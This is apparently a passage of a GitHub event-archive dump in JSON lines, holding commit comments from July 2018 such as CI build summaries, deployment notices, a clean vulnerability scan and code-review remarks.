|\n| `./data/tlg0014/tlg048/__cts__.xml` | New      |\n| `./data/tlg0014/tlg049/__cts__.xml` | New      |\n| `./data/tlg0014/tlg050/__cts__.xml` | New      |\n| `./data/tlg0014/tlg051/__cts__.xml` | New      |\n| `./data/tlg0014/tlg052/__cts__.xml` | New      |\n| `./data/tlg0014/tlg053/__cts__.xml` | New      |\n| `./data/tlg0014/tlg054/__cts__.xml` | New      |\n| `./data/tlg0014/tlg055/__cts__.xml` | New      |\n| `./data/tlg0014/tlg056/__cts__.xml` | New      |\n| `./data/tlg0014/tlg057/__cts__.xml` | New      |\n| `./data/tlg0014/tlg058/__cts__.xml` | New      |\n| `./data/tlg0014/tlg059/__cts__.xml` | New      |\n| `./data/tlg0014/tlg060/__cts__.xml` | New      |\n| `./data/tlg0014/tlg061/__cts__.xml` | New      |\n| `./data/tlg0014/tlg062/__cts__.xml` | New      |\n| `./data/tlg0014/tlg063/__cts__.xml` | New      |\n| `./data/tlg0014/tlg001/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg002/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg003/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg005/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg006/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg007/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg008/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg009/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg010/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg011/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg012/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg013/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg014/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg015/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg016/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg017/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg018/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg019/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg020/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg021/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg022/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg023/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg024/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg025/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg026/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg027/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg028/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg029/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg030/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg031/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg032/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg033/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg034/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg035/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg036/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg037/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg038/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg039/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg040/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg041/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg042/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg043/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg044/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg045/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg046/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg047/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg048/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg049/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg050/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg051/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg052/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg053/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg054/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg055/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg056/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg057/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg058/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg059/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg060/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg061/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg062/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg063/__cts__.xml` | Passing  |\n\n*[Hook UI build recap](http://ci.perseids.org/repo/PerseusDL/canonical-greekLit/4495)*\n"}},"created_at":"2018-07-27T18:47:38Z"}
{"id":"8030222872","type":"CommitCommentEvent","actor":{"login":"rigelk"},"repo":{"name":"Chocobozzz/PeerTube"},"payload":{"comment":{"id":29862516,"position":null,"line":null,"path":null,"commit_id":"7a93e28110b89bea658e4919038505c4b44de2b6","created_at":"2018-07-27T18:48:08Z","updated_at":"2018-07-27T18:48:08Z","author_association":"COLLABORATOR","body":"It's a common pattern to deal with migration in ordered manner."}},"created_at":"2018-07-27T18:48:08Z"}
{"id":"8030229625","type":"CommitCommentEvent","actor":{"login":"Thinking-waffle"},"repo":{"name":"deliciousmods/1956_beta"},"payload":{"comment":{"id":29862539,"position":null,"line":null,"path":null,"commit_id":"111b91aad4b1bb8a33434d3092d6f610bc27f805","created_at":"2018-07-27T18:49:36Z","updated_at":"2018-07-27T18:49:36Z","author_association":"COLLABORATOR","body":"wait apparently it's not working as intended."}},"created_at":"2018-07-27T18:49:36Z"}
{"id":"8030232918","type":"CommitCommentEvent","actor":{"login":"ripplelabs-jenkins"},"repo":{"name":"mellery451/rippled"},"payload":{"comment":{"id":29862555,"position":null,"line":null,"path":null,"commit_id":"1272648f213b5c01d786a230e2982e51aed6bd23","created_at":"2018-07-27T18:50:17Z","updated_at":"2018-07-27T18:50:17Z","author_association":"COLLABORATOR","body":"\n## Jenkins Build Summary\n\nBuilt from [this commit](https://github.com/mellery451/rippled/commit/1272648f213b5c01d786a230e2982e51aed6bd23)\n\nBuilt at __20180727 - 18:50:17__\n\n### Test Results\n\nBuild Type | Log | Result | Status\n---------- | --- | ------ | ------\nmsvc.Debug | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-sslcmake/1//artifact/msvc.Debug.txt) | 1031 cases, 0 failed, t: 537s | PASS :white_check_mark: \ngcc.Debug <br/>-Dcoverage=ON | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-sslcmake/1//artifact/gcc.Debug_Dcoverage_ON.txt) | 1034 cases, 0 failed, t: 844s | PASS :white_check_mark: \ndocs | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-sslcmake/1//artifact/docs.txt) | 1 cases, 0 failed, t: 2s | PASS :white_check_mark: \ngcc.Release <br/>-Dassert=ON, <br/>MANUAL_TESTS=true | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-sslcmake/1//artifact/gcc.Release_Dassert_ON_MANUAL_TESTS_true.txt) | 1101 cases, 0 failed, t: 930s | PASS :white_check_mark: \nclang.Debug <br/>-Dunity=OFF | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-sslcmake/1//artifact/clang.Debug_Dunity_OFF.txt) | 1030 cases, 0 failed, t: 155s | PASS :white_check_mark: \nmsvc.Debug, <br/>NINJA_BUILD=true | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-sslcmake/1//artifact/msvc.Debug_NINJA_BUILD_true.txt) | 1031 cases, 0 failed, t: 549s | PASS :white_check_mark: \nclang.Debug | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-sslcmake/1//artifact/clang.Debug.txt) | 1034 cases, 0 failed, t: 276s | PASS :white_check_mark: \nrpm | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-sslcmake/1//artifact/rpm.txt) | 1034 cases, 0 failed, t: n/a | PASS :white_check_mark: \ngcc.Debug | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-sslcmake/1//artifact/gcc.Debug.txt) | 1034 cases, 0 failed, t: 287s | PASS :white_check_mark: \ngcc.Debug <br/>-Dunity=OFF | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-sslcmake/1//artifact/gcc.Debug_Dunity_OFF.txt) | 1030 cases, 0 failed, t: 280s | PASS :white_check_mark: \nclang.Release <br/>-Dassert=ON | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-sslcmake/1//artifact/clang.Release_Dassert_ON.txt) | 1034 cases, 0 failed, t: 396s | PASS :white_check_mark: \ngcc.Release <br/>-Dassert=ON | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-sslcmake/1//artifact/gcc.Release_Dassert_ON.txt) | 1034 cases, 0 failed, t: 423s | PASS :white_check_mark: \ngcc.Debug <br/>-Dstatic=OFF | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-sslcmake/1//artifact/gcc.Debug_Dstatic_OFF.txt) | 1034 cases, 0 failed, t: 289s | PASS :white_check_mark: \ngcc.Debug <br/>-Dstatic=OFF -DBUILD_SHARED_LIBS=ON | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-sslcmake/1//artifact/gcc.Debug_Dstatic_OFF_DBUILD_SHARED_LIBS_ON.txt) | 1034 cases, 0 failed, t: 294s | PASS :white_check_mark: \nmsvc.Debug <br/>-Dunity=OFF | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-sslcmake/1//artifact/msvc.Debug_Dunity_OFF.txt) | 1027 cases, 0 failed, t: 1165s | PASS :white_check_mark: \ngcc.Debug, <br/>NINJA_BUILD=true | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-sslcmake/1//artifact/gcc.Debug_NINJA_BUILD_true.txt) | 1034 cases, 0 failed, t: 262s | PASS :white_check_mark: \nmsvc.Release | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-sslcmake/1//artifact/msvc.Release.txt) | 1031 cases, 0 failed, t: 391s | PASS :white_check_mark: \nclang.Debug <br/>-Dunity=OFF -Dsan=address, <br/>PARALLEL_TESTS=false, <br/>DEBUGGER=false | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-sslcmake/1//artifact/clang.Debug_Dunity_OFF_Dsan_address_PARALLEL_TESTS_false_DEBUGGER_false.txt) | 1030 cases, 0 failed, t: 1110s | PASS :white_check_mark: \nclang.Debug <br/>-Dunity=OFF -Dsan=undefined, <br/>PARALLEL_TESTS=false | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-sslcmake/1//artifact/clang.Debug_Dunity_OFF_Dsan_undefined_PARALLEL_TESTS_false.txt) | 1030 cases, 0 failed, t: 1204s | PASS :white_check_mark: \n\n"}},"created_at":"2018-07-27T18:50:17Z"}
{"id":"8030238146","type":"CommitCommentEvent","actor":{"login":"aviboot92"},"repo":{"name":"aviboot92/BootStrap-4-websiteLayout"},"payload":{"comment":{"id":29862570,"position":null,"line":null,"path":null,"commit_id":"14ede32ac468873ff68ad036823ec5957979a37d","created_at":"2018-07-27T18:51:21Z","updated_at":"2018-07-27T18:51:21Z","author_association":"OWNER","body":"Better styling for the button"}},"created_at":"2018-07-27T18:51:21Z"}
{"id":"8030240137","type":"CommitCommentEvent","actor":{"login":"Thinking-waffle"},"repo":{"name":"deliciousmods/1956_beta"},"payload":{"comment":{"id":29862574,"position":null,"line":null,"path":null,"commit_id":"111b91aad4b1bb8a33434d3092d6f610bc27f805","created_at":"2018-07-27T18:51:49Z","updated_at":"2018-07-27T18:51:49Z","author_association":"COLLABORATOR","body":"no it's working as intended....except that I expected Ma bufang to be part of the lot, but he isn't as with WTT he appears only with the personnal rule focus so that must be taken into account when tranferring.creating the warlord as a general\r\n"}},"created_at":"2018-07-27T18:51:49Z"}
{"id":"8030245554","type":"CommitCommentEvent","actor":{"login":"ericwhited"},"repo":{"name":"ericwhited/Workshop-Collab"},"payload":{"comment":{"id":29862584,"position":null,"line":null,"path":null,"commit_id":"c8a5609821c0180985512b28960abd8ba5e80534","created_at":"2018-07-27T18:53:00Z","updated_at":"2018-07-27T18:53:00Z","author_association":"OWNER","body":"updated"}},"created_at":"2018-07-27T18:53:00Z"}
{"id":"8030247952","type":"CommitCommentEvent","actor":{"login":"MacDue"},"repo":{"name":"xXCaulDevsYT/BanUtil"},"payload":{"comment":{"id":29862589,"position":null,"line":null,"path":null,"commit_id":"138fc80a43f99d103050ecb5895b6d7243a130b1","created_at":"2018-07-27T18:53:31Z","updated_at":"2018-07-27T18:53:31Z","author_association":"NONE","body":"This is not how the config works & will not work. You set these properties in ``run_local.sh``. \r\nYou can run the bot without manually editing anything by clicking [this link](https://heroku.com/deploy?template=https://github.com/MacDue/BanUtil/tree/master)."}},"created_at":"2018-07-27T18:53:31Z"}
{"id":"8030251297","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29862600,"position":null,"line":null,"path":null,"commit_id":"4a3d2a9717d1fac18b9a104b2faac08a65b8e15a","created_at":"2018-07-27T18:54:16Z","updated_at":"2018-07-27T18:54:16Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-beta](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-beta).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-beta-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-27T18:54:16Z"}
{"id":"8030251886","type":"CommitCommentEvent","actor":{"login":"wheelercreek"},"repo":{"name":"dmzuckerman/PhysicalLensOnTheCell"},"payload":{"comment":{"id":29862602,"position":null,"line":null,"path":null,"commit_id":"de962f2a3694e3d1c63d94ae7fefe90089b04217","created_at":"2018-07-27T18:54:24Z","updated_at":"2018-07-27T18:54:24Z","author_association":"COLLABORATOR","body":"this is completed. "}},"created_at":"2018-07-27T18:54:24Z"}
{"id":"8030251985","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29862603,"position":null,"line":null,"path":null,"commit_id":"512ceb7795d057a62e8a945b0aa98b67d91919ba","created_at":"2018-07-27T18:54:25Z","updated_at":"2018-07-27T18:54:25Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-1004](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-1004).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1004-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-27T18:54:25Z"}
{"id":"8030256232","type":"CommitCommentEvent","actor":{"login":"xoryweb"},"repo":{"name":"xoryweb/example-md-files"},"payload":{"comment":{"id":29862614,"position":null,"line":null,"path":null,"commit_id":"8f61d5417609112d9d68ea4ebfaa95f0f8b28154","created_at":"2018-07-27T18:55:23Z","updated_at":"2018-07-27T18:55:23Z","author_association":"OWNER","body":"Woah what are you doing!!! That's linchpin content... We will go bankrupt!!"}},"created_at":"2018-07-27T18:55:23Z"}
{"id":"8030262090","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29862631,"position":null,"line":null,"path":null,"commit_id":"5984edc527cb2bbbd067569a0d8467fd80fbafb7","created_at":"2018-07-27T18:56:40Z","updated_at":"2018-07-27T18:56:40Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-1007](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-1007).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1007-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-27T18:56:40Z"}
{"id":"8030263575","type":"CommitCommentEvent","actor":{"login":"nicost"},"repo":{"name":"micro-manager/micro-manager"},"payload":{"comment":{"id":29862639,"position":null,"line":null,"path":null,"commit_id":"844570741135ddb7cf6d4b3412979b2d753c1f85","created_at":"2018-07-27T18:57:00Z","updated_at":"2018-07-27T18:57:00Z","author_association":"COLLABORATOR","body":"Aj.. Sorry.  Seemed so innocuous."}},"created_at":"2018-07-27T18:57:00Z"}
{"id":"8030267179","type":"CommitCommentEvent","actor":{"login":"gixoc"},"repo":{"name":"gixoc/adminbar"},"payload":{"comment":{"id":29862645,"position":null,"line":null,"path":null,"commit_id":"bb1dc360e2cab6a731078916c2a73689eacaec0f","created_at":"2018-07-27T18:57:48Z","updated_at":"2018-07-27T18:57:48Z","author_association":"OWNER","body":"Исправление языков"}},"created_at":"2018-07-27T18:57:48Z"}
{"id":"8030267812","type":"CommitCommentEvent","actor":{"login":"treeowl"},"repo":{"name":"arybczak/peer-discovery"},"payload":{"comment":{"id":29862646,"position":8,"line":40,"path":"src/Network/PeerDiscovery/Operations.hs","commit_id":"afdcda256f00df07a52afe237fac7e923193063b","created_at":"2018-07-27T18:57:56Z","updated_at":"2018-07-27T18:57:56Z","author_association":"CONTRIBUTOR","body":"See my PR on the IOHK repo. I think the answer is simply to move the `onException` up to the top so the handler is installed before the STM transaction. But there's another problem: `onException` doesn't *handle* exceptions; it *propagates* them. You need `catch` or `handle` to actually handle an exception. Did you intend for `bootstrap` to return `False` if it receives an exception, or to propagate it?"}},"created_at":"2018-07-27T18:57:56Z"}
{"id":"8030271106","type":"CommitCommentEvent","actor":{"login":"treeowl"},"repo":{"name":"arybczak/peer-discovery"},"payload":{"comment":{"id":29862665,"position":3,"line":37,"path":"src/Network/PeerDiscovery/Operations.hs","commit_id":"afdcda256f00df07a52afe237fac7e923193063b","created_at":"2018-07-27T18:58:41Z","updated_at":"2018-07-27T18:58:41Z","author_association":"CONTRIBUTOR","body":"I think this is basically wrong. If a bootstrap is already in progress, it will wait for it to complete, *then bootstrap again*. See my PR on the IOHK repo."}},"created_at":"2018-07-27T18:58:41Z"}
{"id":"8030275032","type":"CommitCommentEvent","actor":{"login":"DmitriKudriashov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29862677,"position":25,"line":21,"path":"Lesson3/l3_class_Station.rb","commit_id":"a2ab6755a41d8091ae0c547c9904326c77b3440b","created_at":"2018-07-27T18:59:32Z","updated_at":"2018-07-27T18:59:32Z","author_association":"OWNER","body":"Да..уж понял..все надо самому соображать. главное, что в скринкасте насчет таких \"мелочей\" ни слова.\r\nА доп. материал - вы позже дали посмотреть. \r\nВ задании тоже не сказано ничего про использовании создаваемых классов друг в друге. \r\n"}},"created_at":"2018-07-27T18:59:32Z"}
{"id":"8030281853","type":"CommitCommentEvent","actor":{"login":"guruxu"},"repo":{"name":"belph/rosette-api-java"},"payload":{"comment":{"id":29862699,"position":null,"line":null,"path":null,"commit_id":"2ba9dc1033530bdd2fbb60980a5f63e21d785eb1","created_at":"2018-07-27T19:00:58Z","updated_at":"2018-07-27T19:00:58Z","author_association":"NONE","body":"I like @iredpath's proposal to deprecate `embedding`. Hannah can tell us when to delete it.\r\nIs there a change in ADM attribute key as well? That could be a bigger compatibility problem."}},"created_at":"2018-07-27T19:00:58Z"}
{"id":"8030284020","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29862703,"position":null,"line":null,"path":null,"commit_id":"6018aac749a35f801a14da9192df1c8b35530c11","created_at":"2018-07-27T19:01:27Z","updated_at":"2018-07-27T19:01:27Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-1009](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-1009).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1009-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-27T19:01:27Z"}
{"id":"8030285878","type":"CommitCommentEvent","actor":{"login":"Jameson13B"},"repo":{"name":"Jameson13B/Sprint-Challenge-Node-Express"},"payload":{"comment":{"id":29862706,"position":null,"line":null,"path":null,"commit_id":"f20c6b2748046664e8613f714795affd2a3cecd0","created_at":"2018-07-27T19:01:51Z","updated_at":"2018-07-27T19:01:51Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [STRETCH - From the React application show a list of all projects using the API you built.](https://trello.com/c/LJSGCSrk/4-stretch-from-the-react-application-show-a-list-of-all-projects-using-the-api-you-built)"}},"created_at":"2018-07-27T19:01:51Z"}
{"id":"8030287732","type":"CommitCommentEvent","actor":{"login":"sguss2024"},"repo":{"name":"philmander/gulp-hbs"},"payload":{"comment":{"id":29862710,"position":6,"line":6,"path":"LICENSE","commit_id":"556df8ba24499cb73976a052be02f69700ef852f","created_at":"2018-07-27T19:02:15Z","updated_at":"2018-07-27T19:02:15Z","author_association":"NONE","body":"I just found out!OzMG is it really,3years?"}},"created_at":"2018-07-27T19:02:15Z"}
{"id":"8030287816","type":"CommitCommentEvent","actor":{"login":"hatchcliff"},"repo":{"name":"hatchcliff/atari800"},"payload":{"comment":{"id":29862711,"position":null,"line":null,"path":null,"commit_id":"62499ee1f9f314a77bdabdf6764b78a8d6e120f3","created_at":"2018-07-27T19:02:17Z","updated_at":"2018-07-27T19:02:17Z","author_association":"OWNER","body":"These updates are based on recent experience of compiling for the Raspberry Pi.  I think the bit about cross compiling is of minority interest, but since the facility exists I thought it best to include it.\r\n\r\nThe note added at the end of README.RPI about Boulderdash is taken from a forum discussion.  I think it's useful clarification because when I first tried setting the video modes I couldn't see any improvement and wasn't sure if I was missing something or if the advice was out of date."}},"created_at":"2018-07-27T19:02:17Z"}
{"id":"8030287935","type":"CommitCommentEvent","actor":{"login":"twistlock-scan"},"repo":{"name":"sagansystems/chamber"},"payload":{"comment":{"id":29862712,"position":null,"line":null,"path":null,"commit_id":"99ff75e65c38ef6594f3f4dd5ef253dfd0c64f4e","created_at":"2018-07-27T19:02:18Z","updated_at":"2018-07-27T19:02:18Z","author_association":"NONE","body":"\n\n<table>\n    <thead>\n        <tr>\n            <th></th>\n            <th>Status</th>\n            <th>Critical</th>\n            <th>High</th>\n            <th>Medium</th>\n            <th>Low</th>\n        </tr>\n    </thead>\n    <tbody>\n        <tr>\n    <td>Compliance</td>\n    <td>PASSED</td>\n    <td>0</td>\n    <td>0</td>\n    <td>0</td>\n    <td>0</td>\n</tr>\n        <tr>\n    <td>Vulnerabilities</td>\n    <td>PASSED</td>\n    <td>0</td>\n    <td>0</td>\n    <td>0</td>\n    <td>0</td>\n</tr>\n    </tbody>\n</table>\n\nCompliance threshold requires 0 critical (or more severe) issues\nVulnerabily threshold requires 0 critical (or more severe) issues"}},"created_at":"2018-07-27T19:02:18Z"}
{"id":"8030295156","type":"CommitCommentEvent","actor":{"login":"sguss2024"},"repo":{"name":"philmander/gulp-hbs"},"payload":{"comment":{"id":29862727,"position":6,"line":6,"path":"LICENSE","commit_id":"556df8ba24499cb73976a052be02f69700ef852f","created_at":"2018-07-27T19:03:54Z","updated_at":"2018-07-27T19:03:54Z","author_association":"NONE","body":"Then there is the other onr"}},"created_at":"2018-07-27T19:03:54Z"}
{"id":"8030298991","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29862750,"position":null,"line":null,"path":null,"commit_id":"0c9c1208cc23bab862638ac36af4eec8a9c3b27e","created_at":"2018-07-27T19:04:46Z","updated_at":"2018-07-27T19:04:46Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-554](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-554).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-554-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-27T19:04:46Z"}
{"id":"8030301000","type":"CommitCommentEvent","actor":{"login":"niazim3"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29862754,"position":14,"line":19,"path":"code/drasil-lang/Language/Drasil/Label/Core.hs","commit_id":"79ef47ee97ca0a8b0d1dc880c1739dd2fc651a81","created_at":"2018-07-27T19:05:13Z","updated_at":"2018-07-27T19:05:13Z","author_association":"COLLABORATOR","body":"The lens implementation was removed because of the following error: \r\n![image](https://user-images.githubusercontent.com/28247301/43341743-62ff2a62-91ae-11e8-9d9e-a67b94092d02.png), though it may be a good idea to switch over to a lens for `HasShortName` class eventually (in a different branch)."}},"created_at":"2018-07-27T19:05:13Z"}
{"id":"8030302026","type":"CommitCommentEvent","actor":{"login":"PhilMiller"},"repo":{"name":"GNOME/mutter"},"payload":{"comment":{"id":29862760,"position":null,"line":null,"path":null,"commit_id":"62660bbd1526c6135d149df397b2470c6e71969d","created_at":"2018-07-27T19:05:28Z","updated_at":"2018-07-27T19:05:28Z","author_association":"NONE","body":"This matches the patch I posted for Debian bug https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=900002\r\n\r\nIt'll be nice to get a tagged release containing this fix."}},"created_at":"2018-07-27T19:05:28Z"}
{"id":"8030303413","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29862763,"position":null,"line":null,"path":null,"commit_id":"215ab7fc1aa2f2fd64e944a8115d300630f6f32b","created_at":"2018-07-27T19:05:49Z","updated_at":"2018-07-27T19:05:49Z","author_association":"COLLABORATOR","body":"🔥 [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/master/31/display/redirect) (on internal Jenkins) failed in stage 'Test run' 🔥 : hudson.AbortException: script returned exit code 2\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/master/31//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/master/215ab7fc1aa2f2fd64e944a8115d300630f6f32b/31/jenkins-results/api-diff/index.html)\nℹ️ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/master/215ab7fc1aa2f2fd64e944a8115d300630f6f32b/31/jenkins-results/apicomparison/index.html) (please review changes)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/master/215ab7fc1aa2f2fd64e944a8115d300630f6f32b/31/jenkins-results/generator-diff/index.html) (only version changes)\n🔥 [Test run failed](http://xamarin-storage/jenkins/xamarin-macios/master/215ab7fc1aa2f2fd64e944a8115d300630f6f32b/31/jenkins-results/tests/index.html) 🔥\n\n# Test results\n\n<details>\n<summary>1 tests failed, 0 tests skipped, 224 tests passed.</summary>\n\n## Failed tests\n\n * MTouch tests/NUnit: Failed (Execution failed with exit code 1)\n</details>\n"}},"created_at":"2018-07-27T19:05:49Z"}
{"id":"8030304033","type":"CommitCommentEvent","actor":{"login":"giselyalves13"},"repo":{"name":"giselyalves13/twitter_rails"},"payload":{"comment":{"id":29862764,"position":6,"line":6,"path":"app/models/user.rb","commit_id":"37bc459505fdcb8433b18f86d8d714a9865089a9","created_at":"2018-07-27T19:05:58Z","updated_at":"2018-07-27T19:05:58Z","author_association":"OWNER","body":"aah nesse link https://github.com/codahale/bcrypt-ruby ta falando que a autenticaçao com has_security_password funciona com um implementação parecida com a do README pro Rails >3, isso já não bastaria? "}},"created_at":"2018-07-27T19:05:58Z"}
{"id":"8030306591","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"adeynes/cucumber"},"payload":{"comment":{"id":29862770,"position":null,"line":null,"path":null,"commit_id":"845b0488654709a40e3dc11a7a062cf15f0fe86f","created_at":"2018-07-27T19:06:32Z","updated_at":"2018-07-27T19:06:32Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\nError parsing .poggit.yml: Level 0: yaml_parse(): parsing error encountered\nduring parsing: did not find expected '-' indicator (line 8, column 7),\ncontext while parsing a block collection (line 7, column 7) in\n/poggit/src/poggit/webhook/PushHandler.php#75\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/adeynes/cucumber/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `2b9daaea-91d0-11e8-9c21-843146e96ac5`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-27T19:06:32Z"}
